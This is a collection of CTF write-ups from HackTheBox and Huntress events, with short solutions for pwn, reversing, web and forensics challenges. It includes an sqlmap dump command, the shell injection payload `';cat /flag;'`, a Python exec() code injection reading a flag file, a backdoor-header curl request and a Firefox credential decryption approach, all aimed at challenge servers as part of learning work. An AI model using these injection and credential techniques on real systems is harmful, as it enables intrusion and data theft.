            r.recvuntil(b'? ')
            r.sendline(answer.encode())
        else:
            print(challenge)
    except EOFError:
        print(challenge)
        break
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aa95cc10-1add-445a-873d-46ff02013db6)

`HTB{1_wiLl_sT0p_dR0p_4nD_r0Ll_mY_w4Y_oUt!}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Pwn/Writing_on_the_Wall.md:
--------------------------------------------------------------------------------
# Writing on the Wall

## Solution
In this binary, when opened in [Ghidra](https://github.com/NationalSecurityAgency/ghidra), we can see that `local_1e` is a `6`-byte buffer, `local_18` is `8` bytes ending in a space, and the program actually reads `7` bytes of our input into `local_1e`.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6ff4f4fa-a08e-4837-b269-8e03000104b1)

This means that when it reads our input, the [strcmp](https://www.programiz.com/cpp-programming/library-function/cstring/strcmp) stops at a null byte and compares it with a null byte.
So we can just pass 7 null bytes to the program and the strcmp should be true:

```bash
python -c 'print("\x00"*7)'|nc 94.237.56.26 56996
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/22a78a1c-4d3a-4b10-86b9-867d1a7f4c8c)

`HTB{3v3ryth1ng_15_r34d4bl3}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/README.md:
--------------------------------------------------------------------------------
I got 243rd out of 5694 teams, 34/67 solves... that's top 4.26%.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ab142bb3-db05-4759-8c1b-2fd652ebe71c)

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Rev/BoxCutter.md:
--------------------------------------------------------------------------------
# BoxCutter

## Solution
Trying to run the binary directly, we get an error about a box not being found:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7229bb65-d4e3-49f9-9d8b-73ec41aa0ba7)

If we run it with `strace`, however, we can see it is trying to access a file or directory that doesn't exist... because it's our flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/72695b07-f8c0-4048-8280-9ccfc2268038)

We can also get it with `strace`:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9856733a-c422-4a51-ac9a-42b23f5b4cda)

`HTB{tr4c1ng_th3_c4ll5}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Rev/Lootstash.md:
--------------------------------------------------------------------------------
# Lootstash

## Solution
Champions of any CTF, our dynamic duo `strings` and `grep` get us a very easy flag.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8b7e32a-0fc8-44b3-94b3-b69f892e349a)

HTB{n33dl3_1n_a_l00t_stack}

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Rev/PackedAway.md:
--------------------------------------------------------------------------------
# PackedAway

## Solution
Running `strings` on the provided binary, we can tell it is [UPX](https://upx.github.io/) packed:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b77e2ef-1713-4621-b4d6-5ce98a7241a0)

We can also use `upx` to unpack it:
```bash
upx -d packed
```
Now that the binary is unpacked, we can run `strings` on it and grep for the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/36a0dcf8-c46f-4618-86b6-da36fab71f4f)

`HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Web/Flag_Command.md:
--------------------------------------------------------------------------------
# Flag Command

## Enumeration

The web application provided starts as an old-school game with prompts, and we have to choose from some options:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2c9804e7-e3cf-407a-adad-a273d5f711d1)

We see it making a GET request to an API for some options:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/14206fcf-7bf2-445b-8d97-1c96c1942ab8)

Which shows us the possible commands:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6dc4f8c1-6488-4d31-9e29-f582d70c6c52)

## Solution
At the bottom we see a secret command.
I wonder what that does if we input it instead of the expected commands:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/12153139-6cd1-4781-b354-9d3a6e9f6bc3)

Nice, we got the flag:
`HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Web/KORP_Terminal.md:
--------------------------------------------------------------------------------
# KORP Terminal

## Enumeration

The web application shows a very nice old-school login prompt:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/876db01f-d0b7-49c1-850e-c6ee07b9a4e7)

If we try a single quote, we get a very helpful SQL error indicating a possible SQL injection vulnerability:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8ae2a9db-a3ba-41d6-9670-16ad6b5de537)

## Solution
In this case SQLMap goes brrr. We don't need to conserve our time for the harder challenges ahead.
```bash
sqlmap -r req.txt -p username --dbms=mysql --ignore-code 401 --dump
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f3d0ba4a-c63e-46dd-9e9b-4f3db1f2549f)

Easy crack with rockyou, since it's one of the first passwords in the wordlist:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f26d7b15-ca8d-43bf-a7a5-795a2284d6d1)

After we log in, we get our flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/473d9508-41fe-463a-9ec2-9c5b72488f31)

`HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Web/TimeKORP.md:
--------------------------------------------------------------------------------
# TimeKORP

## Enumeration

The web application gives us the option to check what time it is, or what date it is:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f0724e61-d804-486b-afb7-9025de74b838)

However, from the source code, we can see that it's executing the Linux `date` command with our user input, the `format` parameter, without any sanitisation.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6327ad50-c655-455d-8c05-e7192b921d70)

From the Dockerfile, we can also see where the flag should be:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/238fbd97-e8c1-4ace-8c01-a527083f051f)

In this case, we simply need to close the single quote of the date command, add a semicolon, our command, another semicolon, and then another single quote so that the original closing quote and the stderr redirect after it remain valid.
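The root cause here, as in the Gunhead challenge earlier on this page, is user input being spliced into a shell command line. As an added example (written in Python rather than the challenge's PHP, and not code from the writeup or the challenge source), here is the vulnerable construction next to a version that never lets the `format` reach a shell: the client picks a named option, the server owns the format string, and `date` is run with an argv list instead of `shell=True`. The function names, the named-format table and the metacharacter check are this example's own.

```python
"""Added example, not from the writeup: the TimeKORP pattern (user-supplied
`format` inside `date '+<format>' 2>&1`) next to a hardened equivalent."""
import re
import subprocess


def vulnerable_command(fmt: str) -> str:
    """What the challenge effectively does: the format lands inside single
    quotes, so a quote in the input ends the literal and the rest of the
    input is parsed by the shell.  Returned as text only; never run this."""
    return f"date '+{fmt}' 2>&1"


# Hardened: the client chooses a name, the server maps it to a fixed format.
# The user never supplies format text at all.
ALLOWED_FORMATS = {
    "time": "%H:%M:%S",
    "date": "%Y-%m-%d",
}


def safe_command(choice: str) -> list:
    """Build argv for date.  An unknown choice is an error, not pass-through."""
    fmt = ALLOWED_FORMATS.get(choice)
    if fmt is None:
        raise ValueError(f"unknown format choice: {choice!r}")
    return ["date", "+" + fmt]


def run_date(choice: str) -> str:
    """Execute date with an argv list: no shell, so nothing is re-parsed."""
    result = subprocess.run(
        safe_command(choice), capture_output=True, text=True, check=True
    )
    return result.stdout.strip()


# Detection aid for request logs or a WAF rule: a date format string has no
# legitimate reason to contain shell metacharacters.
SHELL_META = re.compile(r"[;&|`$'\"\\\n<>]")


def looks_like_injection(fmt: str) -> bool:
    """True when a submitted format contains characters a shell would act on."""
    return SHELL_META.search(fmt) is not None


def is_hms(value: str) -> bool:
    """Helper for checking run_date('time') output (HH:MM:SS)."""
    return re.fullmatch(r"\d{2}:\d{2}:\d{2}", value) is not None


if __name__ == "__main__":
    # The writeup's payload turns the vulnerable command line into three
    # shell statements; the safe path simply refuses it.
    payload = "';cat /flag;'"
    print(vulnerable_command(payload))
    print(looks_like_injection(payload))
    print(run_date("time"))
```

Feeding the writeup's payload into `vulnerable_command` yields `date '+';cat /flag;'' 2>&1`, which the shell reads as `date '+'`, then `cat /flag`, then an empty command with the redirect. The same payload given to `safe_command` raises `ValueError`, and `looks_like_injection` flags it for logging before any command is built.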

## Solution
Payload: `';cat /flag;'`

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fb2df9b0-0406-4d7d-8c7c-aeb2d1906ae1)

Nice, we got the flag:
`HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}`

--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Forensics/Trick_or_Breach.md:
--------------------------------------------------------------------------------
With `strings` we see a lot of DNS requests with a hex string in the subdomain:

![image](https://user-images.githubusercontent.com/80063008/198271579-a7160e6f-fd59-4f1b-adef-68cc2b78419f.png)

So there's been some DNS exfil done here. Carved it out with tshark and some awk action. I'm sure only tshark could've been used but I'm not that familiar with it and I was in a hurry. We can output the result into a file and see what it is.

```bash
tshark -r capture.pcap -Y 'dns.resp.name'|awk '{print $13}'|awk -F "." '{print $1}' |xxd -r -p > mysterfile
```
![image](https://user-images.githubusercontent.com/80063008/198272011-e132d952-f835-4ee4-b63b-6a3991a309f6.png)

Looks like an Excel file. Let's open it (always be careful and take precautions when opening such files from the internet).

![image](https://user-images.githubusercontent.com/80063008/198272094-e1aaa5cc-4597-4ddb-98d4-96fe2e6b3c9c.png)

HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch}

--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Forensics/Wrong_Spooky_Season.md:
--------------------------------------------------------------------------------
Running `strings` on the provided pcap file, we can see a string that looks like reversed base64.

![image](https://user-images.githubusercontent.com/80063008/198272330-0da311e8-bddb-4835-b44a-bd0cfe3f35a5.png)

Copied it, echoed it, reversed it and base64-decoded it in the terminal.

```bash
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS"|rev|base64 -d
```

![image](https://user-images.githubusercontent.com/80063008/198272437-c7bbd787-a20a-4fd4-969b-7f089d00ac4a.png)

HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Pwn/Pumpkin_Stand.md:
--------------------------------------------------------------------------------
When launching the given binary, we see some cool pumpkin ASCII art, a current wallet of 1337 pumpcoins and the option to buy a shovel or a laser.

![image](https://user-images.githubusercontent.com/80063008/198273526-fb1ac366-7461-429b-b4fa-1721010bc173.png)

I experimented by giving it various numbers I thought it wouldn't expect. I noticed that when inputting a number starting with a 0, the pumpcoin balance goes to a large negative number.

This behaviour points to an integer overflow type of vulnerability. So I tried to buy a laser and, when asked how many I wanted, I gave it a large number like 999. I repeated the step and then the flag was revealed.

![image](https://user-images.githubusercontent.com/80063008/198273561-2d26f8f1-43b4-46c3-9897-c5fec4db2f56.png)

HTB{1nt3g3R_0v3rfl0w_101_0r_0v3R_9000!}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/README.md:
--------------------------------------------------------------------------------
I participated in HackTheBox HackTheBoo Halloween CTF and ended up 175th out of 6367. That's top 2.7%. This individual CTF was very fun and had some great challenges that make for good writeups.

Here are my writeups for the challenges I solved.

![image](https://user-images.githubusercontent.com/80063008/198297472-0bcd7e04-d41f-4b0b-8233-bcd346e0d4e7.png)
![image](https://user-images.githubusercontent.com/80063008/198292019-49d008ff-4a4a-4536-8fc6-0ce8dabc969e.png)

--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Rev/Cult_Meeting.md:
--------------------------------------------------------------------------------
Running the binary with `ltrace`, we can see it doing a string compare where the passphrase is leaked.

![image](https://user-images.githubusercontent.com/80063008/198257408-bdd4e192-efa3-421f-bb45-958fb414a9bd.png)

Connect to the challenge using netcat, give it the passphrase and get the flag.

![image](https://user-images.githubusercontent.com/80063008/198257515-a2ef9387-926b-42a4-8382-55f8613b9bea.png)

HTB{1nf1ltr4t1ng_4_cul7_0f_str1ng5}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Rev/EncodedPayload.md:
--------------------------------------------------------------------------------
Nothing too fancy here. Running this binary with `strace`, we can see the flag is leaked right away.

![image](https://user-images.githubusercontent.com/80063008/198257584-8df9b566-b00d-4003-868a-3ee2f0666ba1.png)

Generally, running pwn/rev binaries with `ltrace` and `strace` is one of the first things I do in CTFs. It can leak a lot of good information.

HTB{PLz_strace_M333}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Rev/Ghost_Wrangler.md:
--------------------------------------------------------------------------------
I used radare2 to debug this application.

Let's first load the binary into the debugger.

```bash
r2 ghost
```

Analyze everything (functions, symbols and references):

`aaa`

![image](https://user-images.githubusercontent.com/80063008/198257671-e14bf083-8654-4b22-bc03-5612ba488a25.png)

List all functions:

`afl`

![image](https://user-images.githubusercontent.com/80063008/198257705-bbf7dcfa-d0dc-471c-acfd-417ad5dfa242.png)

Disassembling any of the functions above using the `pdf` command along with the memory address of the function displayed next to it, we get the hard-coded string that is XORed with `0x13`. In this case, we disassemble the function we care about, `get_flag`:

`pdf@0x00001155`

![image](https://user-images.githubusercontent.com/80063008/198257751-30e224cc-f6d6-417a-a8f8-16965ed229ab.png)

This string can also be found by running `strings`, and the XOR operation can be seen using Ghidra as well.

![image](https://user-images.githubusercontent.com/80063008/198257910-904db281-a7e0-4ab8-85a3-9bea764213df.png)

We can use CyberChef to apply the XOR operation and get the flag.

![image](https://user-images.githubusercontent.com/80063008/198257938-4794a12c-5bac-4124-9544-a65fecef18ec.png)

HTB{h4unt3d_by_th3_gh0st5_0f_ctf5_p45t!}

--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Rev/Ouija.md:
--------------------------------------------------------------------------------
We can simply run `strings` on this binary. `-n 10` shows only strings of 10 characters or more.

![image](https://user-images.githubusercontent.com/80063008/198258137-da52673a-9fdd-4a18-86dc-ace891409d4f.png)

We have something in the flag format. I recognize it as being rotated. I put it in CyberChef and rotate it until I get the flag.

![image](https://user-images.githubusercontent.com/80063008/198258172-bc062749-b2b1-462e-bd95-a771ba0fb715.png)

HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Web/Evaluation_Deck.md:
--------------------------------------------------------------------------------
In this challenge we see a website with some cards that we can click on.

![image](https://user-images.githubusercontent.com/80063008/198007212-69ecbdd8-7bb0-4135-ac13-dde897e7d58a.png)

In the source code provided, we notice an `exec()` call that executes code built from the request. `current_health` and `attack_power` are cast to integers, but the `operator` is taken directly from user input.

![image](https://user-images.githubusercontent.com/80063008/198007296-86cecbc7-14db-4439-88c2-c55332bb012c.png)

This is what a normal POST request looks like when we click on a card.

![image](https://user-images.githubusercontent.com/80063008/198008086-8a6e51ac-9a17-4738-930e-3e53754acd34.png)

Since there is no input validation, we can inject Python code into the `operator` key and get a reverse shell:

![image](https://user-images.githubusercontent.com/80063008/198008340-0da1a18c-172f-4a11-9dc8-2961f509d0b5.png)

![image](https://user-images.githubusercontent.com/80063008/198008388-7242063d-ac5d-4685-b2c8-dca6be0f7143.png)

Alternatively, we can simply read the flag directly in the response with the payload below:

`;f = open('/flag.txt', 'r'); result = f.read();`

HTB{c0d3_1nj3ct10ns_4r3_Gr3at!!}
--------------------------------------------------------------------------------
/HTB - HackTheBoo_2022/Web/Juggling_Facts.md:
--------------------------------------------------------------------------------
The title of this challenge gave the attack away immediately for me. As soon as I saw that the source code is PHP, I knew this is a type juggling vulnerability.

We can see in the source code, specifically the entrypoint.sh file, that the flag is in secrets.

![image](https://user-images.githubusercontent.com/80063008/198254556-ec45546c-61f1-4ba8-b074-9a8d7d637a8c.png)

We try to read that but get the error that it can only be accessed from localhost.

![image](https://user-images.githubusercontent.com/80063008/198254660-b7e73e6c-304d-4ff6-9dee-9db71b16a8a7.png)

We switch the type to boolean `true` and we get the flag.

![image](https://user-images.githubusercontent.com/80063008/198254713-c0197a98-bd59-4045-83e7-8419ce52c3ae.png)

HTB{sw1tch_stat3m3nts_4r3_vuln3r4bl3!!!}

--------------------------------------------------------------------------------
/Huntress-CTF-2023/Forensics/Backdoored_Splunk.md:
--------------------------------------------------------------------------------
# Backdoored Splunk

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5e917244-7df1-44ff-92ac-90dc5ae7d2ab)

### Solution
There were a lot of files in this archive, but one in particular drew my attention: `nt6-health.ps1`. It didn't take me long to find because I was thinking like an attacker and prioritized looking at the scripts first.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b8402b6-fe2d-4856-9e8b-3494dcbcaa8e)

In this script, we can see an Invoke-WebRequest is made with a specific value for a Basic Authorization header.
We can replicate that using curl:

```bash
curl -s -H 'Authorization: Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==' http://chal.ctf.games:31029
```

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8e3d1ae-fc89-49ec-93a9-ea57108b8ddc)

We can go one step further and carve out the flag directly:

```bash
curl -s -H 'Authorization: Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==' http://chal.ctf.games:32337|awk '{print $2}'|base64 -d
```

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30be457d-441e-4698-9efb-98f357f40198)

flag{60bb3bfaf703e0fa36730ab70e115bd7}

--------------------------------------------------------------------------------
/Huntress-CTF-2023/Forensics/Dumpster_Fire.md:
--------------------------------------------------------------------------------
# Dumpster Fire

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2481bf41-98db-4c7b-8456-cc394ed1bc06)

### Solution
We seem to have a dump of a Linux filesystem. As always, I start by looking in the user's folders:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/80f9e908-807a-43ea-80d2-ebc72f2974be)

What draws my attention immediately is the `.mozilla` folder. This guy may have accessed some websites containing flags. We can use the following tool to decrypt a Firefox profile and all of its contents, including stored credentials:

https://github.com/unode/firefox_decrypt

Indeed, when we run the tool and give it the specific profile we want decrypted, we get the flag as part of a password used at some point.
15 | 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a1ad4009-ec68-451f-9d91-f69e578d152b) 17 | 18 | flag{35446041dc161cf5c9c325a3d28af3e3} 19 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Opposable_Thumbs.md: -------------------------------------------------------------------------------- 1 | # Opposable Thumbs 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e3756d2b-5c4f-4da7-8099-e22eed4c170a) 5 | 6 | ### Solution 7 | In this case, running a file command doesn't really help as we only get that it contains data: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/17f6b37a-80e3-49f6-b8aa-f460ca6c7e08) 9 | 10 | In such cases, I revert to manually looking at the file header using a hexeditor. In some cases it may simply be wrong or missing. In this case however, we see an unfamiliar header called `CMMM`: 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8bc15e0-ba8d-45aa-89ac-b2412f5f95ed) 13 | 14 | A quick google search indicates that this is a Windows cache file: 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ded9416e-b852-4489-beef-baf646f80ed6) 16 | 17 | I'm sure that there are several ways of reading this file, however, the way I did it is by using this tool: 18 | https://github.com/dbrant/ThumbCacheViewer 19 | 20 | This tool sees the other cache files in my VM as well but the one we are interested in is the one with 256 in the name and we get the flag: 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d27defba-2730-492a-8002-90a3a7057674) 22 | 23 | flag{human_after_all} 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Traffic.md: -------------------------------------------------------------------------------- 1 | # Traffic 2 | 3 | ### Challenge 
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7e0c5469-f06c-4319-a60a-2fc6f2d8d6f6)

### Solution
After we unzip all of the files, we get down to some logs:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4d8da37a-1a29-470d-87f7-dac9d30dc01f)

At first I used `cat` to read each category of logs: capture*, conn*, ssl*. After that, I read the challenge description more carefully and grepped for the word `sketchy`.

```bash
strings *|grep sketchy
```
We can indeed find a sketchy website being accessed more than once:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d5786289-2178-4b9d-b577-8df1460d49ec)

Accessing the website ourselves, we can find the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ca625ed4-46cf-4607-bbec-31142478ce46)

We can also run this command directly:
```bash
curl -s -L sketchysite.github.io|grep flag
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1bf7b950-ec0c-46a3-b187-b55ca46d31d5)


flag{8626fe7dcd8d412a80d0b3f0e36afd4a}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Forensics/Tragedy.md:
--------------------------------------------------------------------------------
# Tragedy

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c35b7771-60f9-41aa-a97a-e6df885d5a71)

### Solution
When this was initially posted, the description looked different.
A mistake was made and they accidentally uploaded the file with the solution and the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8901cd94-349a-40cf-b3fc-2c4b8f640a84)

These were free points:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9f8f208c-a566-4e9e-aa48-f465f9952f29)
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Forensics/Wimble.md:
--------------------------------------------------------------------------------
# Wimble

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/468c6246-07a9-49d3-8f2a-e5ea567476b5)

### Solution
This was a duplicate challenge from Nahamcon CTF 2023. The solution can be found [here](https://github.com/LazyTitan33/CTF-Writeups/blob/main/Nahamcon-2023/Forensics/Fetch.md).

flag{97f33c9783c21df85d79d613b0b258bd}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Malware/Opendir.md:
--------------------------------------------------------------------------------
# Opendir

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b2c71c37-2984-4343-bf92-a538410f372d)

### Solution
Accessing the generated challenge link, we can find a directory listing:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/20fd2bf9-0e43-4f2a-b6ec-96541400c68d)

I realized it would take too long to manually go through it all, so I used this `wget` command to recursively download all the content into a folder:

```bash
wget -r --user opendir --password opendir http://chal.ctf.games:32688/
```
I then used `grep` to recursively search for the flag and show the line number and file in which the flag is located (force of habit):

```bash
grep -rna 'flag{'
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6719de08-913d-4263-80a7-c8842f2335f5)

flag{9eb4ebf423b4e5b2a88aa92b0578cbd9}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Malware/Rat.md:
--------------------------------------------------------------------------------
# Rat

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5d1f7e2f-ce4a-42af-938d-2dda61c4da27)

### Solution
After a bit of static analysis and struggling to do dynamic analysis with Procmon, Wireshark, TCPView etc., I uploaded the binary file to VirusTotal:
https://www.virustotal.com/gui/file/7a83115ab46ba6a3c237d78f32bd3386ff4d4d7cd7b06ad731fe8071b2246278/behavior

Scrolling through the details, I noticed the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/18bb692a-a2cb-4b6f-9881-2a20d6a83e33)

flag{8b988b859588f2725f0c859104919019}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Malware/Snake_Eater.md:
--------------------------------------------------------------------------------
# Snake Eater

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/450b20c6-075c-4c20-a629-ad71b9a0e3c7)

### Solution
Running the `file` command on the executable we are given doesn't help much:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f3face6a-a846-4348-ab0e-86fbfe788330)

However, running `strings` on it, we get some indications that this is actually a Python script that has been obfuscated and compiled into a self-contained binary.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/463b5c4b-e370-4dfb-8634-1e23577fe6f0)

If we put this in a Windows VM, we can see the icon mentioned in the challenge description, which confirms it's a Python executable:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1cbfd62f-f653-47e5-a6a7-0928d724e6ca)

I have to admit that I wasted a lot of time on this challenge trying to do static analysis. I struggled to decompile it to clean and readable Python code, so after a couple of hours I decided to do dynamic analysis instead.

In a segregated Windows VM, I started `Procmon` and configured it to show only processes started by my binary and find anything in the path where `flag` is mentioned:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/03dc3f98-1aeb-4285-9e97-8f01d5d61313)

Once I executed the binary, I immediately got the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/962efcbe-a81b-4f8f-bf42-f7a4e567777c)

flag{d1343a2fc5d8427801dd1fd417f12628}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Malware/Zerion.md:
--------------------------------------------------------------------------------
# Zerion

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45c2cd89-0363-4547-9266-c3922251a31b)

### Solution
Running the `file` command, we see that we got a PHP script:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3aa974e5-9e00-43a4-b588-c3156821d0bd)

The script contains what looks like Base64 data but reversed.
This is easy to tell because it starts with a double equals sign, and Base64 padding (`=`) only ever appears at the end of a string:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1a253e71-d098-40c2-acea-3a553dcb94a5)

We copy and paste the blob into CyberChef, reverse it and Base64-decode it, and we can see the flag inside:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/93c99bf9-c67c-4581-90bd-ad8ef2732e80)

flag{af10370d485952897d5183aa09e19883}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Misc/Discord_Snowflake_Scramble.md:
--------------------------------------------------------------------------------
# Discord Snowflake Scramble

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3b60266a-9def-4f1e-ae18-36b7939da712)

### Solution
This one required some googling, but because of SEO a lot of results were nothing I was interested in, so I switched search engines and used DuckDuckGo:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ee9e5f69-d826-44d7-a0fc-2ca05e9c85d3)

The first 3 results show tools that parse the IDs in the link we were provided differently. Turns out these IDs are called Snowflakes and they can represent either a Message ID, a Server ID, a Channel ID etc. The tool that ultimately helped me further was [discordtools](https://discordtools.io). I was reticent at first because for it to give you detailed information, other than the timestamp of the snowflake, they require you to login with your Discord account. However, the good news is that it's an Open Source application with their code on GitHub, so that was reassuring for me.
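The timestamp part of a snowflake needs no login at all: the ID embeds its own creation time. The following is an added example (not the write-up author's code) that splits a snowflake into its fields and pulls the IDs out of a channel link; the link used in the demo is constructed, and the single known snowflake and its field values come from Discord's public API documentation.

```python
"""Decode Discord snowflake IDs (added example, not from the original write-up).

A snowflake is a 64-bit integer: bits 22..63 hold milliseconds since the
Discord epoch (2015-01-01T00:00:00Z), bits 17..21 an internal worker ID,
bits 12..16 an internal process ID and bits 0..11 a per-process increment.
Server, channel, message and user IDs all share this layout, so the creation
time of any of them can be read offline without authenticating to Discord.
"""
import re
from datetime import datetime, timedelta, timezone

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z in Unix milliseconds

# Matches the snowflakes in a "channels" link: guild, channel and (optionally) message.
CHANNEL_LINK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/channels/(\d+)/(\d+)(?:/(\d+))?"
)


def decode_snowflake(snowflake: int) -> dict:
    """Split a snowflake into its fields and an absolute UTC creation time."""
    if not 0 <= snowflake < 2**64:
        raise ValueError("snowflake must be an unsigned 64-bit integer")
    unix_ms = DISCORD_EPOCH_MS + (snowflake >> 22)
    # Build the datetime from whole seconds plus milliseconds to avoid float rounding.
    created = datetime.fromtimestamp(unix_ms // 1000, tz=timezone.utc) + timedelta(
        milliseconds=unix_ms % 1000
    )
    return {
        "timestamp_ms": unix_ms,
        "created_utc": created,
        "worker_id": (snowflake >> 17) & 0x1F,
        "process_id": (snowflake >> 12) & 0x1F,
        "increment": snowflake & 0xFFF,
    }


def parse_channel_link(link: str) -> dict:
    """Return the decoded guild/channel/message snowflakes found in a Discord channel link."""
    m = CHANNEL_LINK_RE.fullmatch(link.strip())
    if m is None:
        raise ValueError("not a Discord channel/message link")
    names = ("guild", "channel", "message")
    return {name: decode_snowflake(int(sf)) for name, sf in zip(names, m.groups()) if sf}


if __name__ == "__main__":
    # Snowflake and expected fields taken from Discord's public API documentation.
    info = decode_snowflake(175928847299117063)
    print(info["created_utc"].isoformat(), info["worker_id"], info["process_id"], info["increment"])
    # Constructed link: the IDs are synthetic and do not point at a real server.
    demo = "https://discord.com/channels/175928847299117063/175928847299117064/175928847299117065"
    for name, fields in parse_channel_link(demo).items():
        print(f"{name}: created {fields['created_utc'].isoformat()}")
```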

I inputted the first Snowflake from the link and sure enough, getting the detailed Discord info, we can see an Invite link:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/93bf427c-8a5e-426c-ac89-fe7c35e1ff56)

